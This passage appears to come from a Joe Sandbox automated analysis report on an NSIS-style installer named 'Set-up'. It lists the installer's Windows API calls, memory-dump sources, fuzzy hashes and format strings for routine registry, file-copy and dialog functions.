                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: *?|<>/":
                                                                • API String ID: 589700163-165019052
                                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Close$DeleteEnumOpen
                                                                • String ID:
                                                                • API String ID: 1912718029-0
                                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                APIs
                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                • String ID:
                                                                • API String ID: 3376005127-0
                                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                • String ID:
                                                                • API String ID: 2568930968-0
                                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                APIs
                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                APIs
                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                Strings
                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                • API String ID: 1697273262-1764544995
                                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID: $@rD
                                                                • API String ID: 3748168415-881980237
                                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                APIs
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                • String ID: CopyFiles "%s"->"%s"
                                                                • API String ID: 2577523808-3778932970
                                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: lstrcatwsprintf
                                                                • String ID: %02x%c$...
                                                                • API String ID: 3065427908-1057055748
                                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                • API String ID: 2266616436-4211696005
                                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00402100
                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                • String ID:
                                                                • API String ID: 1599320355-0
                                                                • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                APIs
                                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                • String ID: Version
                                                                • API String ID: 512980652-315105994
                                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                • String ID:
                                                                • API String ID: 2883127279-0
                                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                APIs
                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
